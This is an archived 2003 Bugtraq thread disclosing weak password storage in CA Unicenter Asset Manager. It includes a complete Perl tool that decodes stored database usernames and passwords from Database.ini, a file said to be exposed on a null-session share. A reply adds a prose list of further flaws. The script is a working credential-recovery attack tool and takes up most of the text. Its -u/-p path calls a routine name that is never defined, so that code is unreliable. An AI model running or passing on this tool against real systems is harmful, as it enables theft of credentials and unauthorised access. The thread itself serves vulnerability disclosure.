Bugtraq mailing list archives
Re: CA Unicenter Password Recovery Tool
From: Joao Gouveia <tharbad () kaotik org>
Date: 04 Jun 2003 19:21:37 +0100
Hello Tor, all While you're at it, you might want to take a look at this. I've came across with this vulnerabilities while doing a superficial review on CA's TNG Unicenter. Not sure if some of this may afect "Asset Manager" or not. <quote> #1. Remote command execution via file upload ( http://machine/scripts/file_upload.pl ) #2. A helpdesk user with no special access rights can read any file on the system were the Service desk daemon has access ( by default Local/SYSTEM ). The pdmcgi.exe except "templates" as a parameter without further security check regarding what type of files can be used as "templates". #3. pdm_cgireport.exe allows to create and browse any report without prior authentication. #4. Normal user, who is configured to see only his requests, is able to see all requests by manipulating pdmcgi.exe queries. </quote> AFAIK, all this issues have been fixed, but I have no clue if the fixes are public or not. You should contact CA if you feel you might be vulnerable. Best regards, Joao Gouveia ------------ tharbad () kaotik org On Wed, 2003-06-04 at 16:27, Tor Houghton wrote:
List, The following can also be found at: http://www.kufumo.com/releases/ca-passwordrecover.txt Thanks, Tor Houghton ; $Id: ca-passwordrecover.txt,v 1.3 2003/05/20 10:46:51 torh Exp $ Computer Associates "Asset Manager" Password Recovery Tool (c) 2003 Tor Houghton (th at kufumo dot com) ++Synopsis++ The Computer Associates' Unicenter Asset Manager(TM) software uses a stored secret in order to decrypt stored passwords. Attached to this text is a tool to decrypt these passwords. ++What++ (http://www3.ca.com/Solutions/Collateral.asp?CID=33237&ID=194) Simply put, it is a data collector with extended privileges. It is comprised of an "Engine" (and a database), one or more "Sectors", a "Console" and an "Agent" for each device (Windows or UNIX) that is to be added to the asset database (see fig 1). [Console] +-------- [Agent] | | v v [Database] <-- [Engine] --> [Sector] <-- [Agent] | +-------> [Sector] <-- [Agent] ^ | +-------- [Agent] (figure 1) The arrows do not depict data flow, but transaction flow. For example, the Agents do get data from the Sector (and deliver data to it), but the Agent initiates this transaction. The Engine issues jobs and collects results (both stored on the Sector) and the Agent executes these. On the whole, this looks like a nice design; you could easily firewall the Engine, Console and Database from the rest of the network, for example. However, the Sector is (by default) a NULLSESSION share, writable by anyone. Anyway. This document is not about whether or not it is possible to compromise any machine with an Agent on it through a Sector, but to release a password recovery tool. Here it is. -- #!/usr/bin/perl $version='ca-dbpwrecover 1.2 2003/03/19'; ## ## (c) th at kufumo.com 2003 ## ## this version was based on AMO Unicenter 3.2 ## ## thanks to emf at kufumo.com and ssw at kufumo.com for help with the ## disassembly and helping to reverse the encoding algorithm! go daddy! ## ## can't find a suitable file? ## ## (a default installation has the file 'Database.ini' available via a ## nullsession share ("amdomain$") on the machine running the console/ ## engine.) ## ## $|=1; ## $ironic_seed="NetCon"; ## we predict $ironic_seed will change ## in the next version of CA AMO etc. $CRYPT="BP7xCtDQqA2EZWoFH6wSIJeMzdYLb9Vfm5uNO4cKRGT3kUX018apyghijlnrsv"; $CLEAR="ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"; use Getopt::Long; GetOptions("h", "u=s" => \$uname, "p=s" => \$pword, "f=s" => \$file); if($opt_h) { print <<EOM; $version (c) 2003 th at kufumo.com usage: ca-dbpwrecover [-h] [-u <username>] [-p <passwd>] [-f <file>] -h : this -p : password (if not using files) -u : username (if not using files) -f : filename (e.g. 'ca-dbpwrecover -f Database.ini') EOM exit(1); } if($file) { DecryptCAEncryption("","",$file); } else { if($pword && $uname) { DecryptCADecryption($pword,$uname,""); exit(0); } else { print "Not enough parameters. Try -h.\n"; exit(1); } } exit(); sub DecryptCAEncryption { my($pword,$uname,$file)=@_; my($u,$c,$oa,$ob,$offset); my(@crypt)=split(//,$CRYPT); if($file) { open(IN,$file) || die "error: failed to open $file: $!\n"; while(<IN>) { if(/^UserName=\#(\S+)\s*$/) {$name=$1;} if(/^Password=\#(\S+)\s*$/) {$pass=$1;} } close(IN); } $uname=$name if($name); $pword=$pass if($pass); @pass=split(//,$pword); @user=split(//,$uname); @nc=split(//,$ironic_seed); print "Username: "; $c=5; for($u=0;$u<@user;$u++) { ## find occurrance of current char ($user[$u]) in cleartext ## keystring: $_=$CLEAR; while(m/$user[$u]/g) { $oa=pos; } $oa++; if($u<@nc) { $_=$CRYPT; while(m/$nc[$u]/g) { $ob=pos; } $ob++; $oa=$oa+($ob*-1); } else { $oa=$oa-$u+$c; $c++; } while($oa<0) { $oa=$oa+62; } while($oa>62) { $oa=$oa-62; } $oa--; push(@clear,$crypt[$oa-1-$u]); } foreach(@clear) { print $_; } print "\n"; ## who said reuse of code is a good thing? ## i think i failed class here. heck, did you want the tool or not? ## print "Password: "; $c=@clear; for($u=0;$u<@pass;$u++) { ## find occurrance of current char ($user[$u]) in cleartext ## keystring: $_=$CLEAR; while(m/$pass[$u]/g) { $oa=pos; } $oa++; if($u<@clear) { $_=$CRYPT; while(m/$clear[$u]/g) { $ob=pos; } $ob++; $oa=$oa+($ob*-1); } else { $oa=$oa-$u+$c-1; $c++; } while($oa<0) { $oa=$oa+62; } while($oa>62) { $oa=$oa-62; } $oa--; push(@cpass,$crypt[$oa-1-$u]); } foreach(@cpass) { print $_; } print "\n"; }
Attachment:
signature.asc
Description: This is a digitally signed message part
Current thread:
- CA Unicenter Password Recovery Tool Tor Houghton (Jun 04)
- Re: CA Unicenter Password Recovery Tool Joao Gouveia (Jun 04)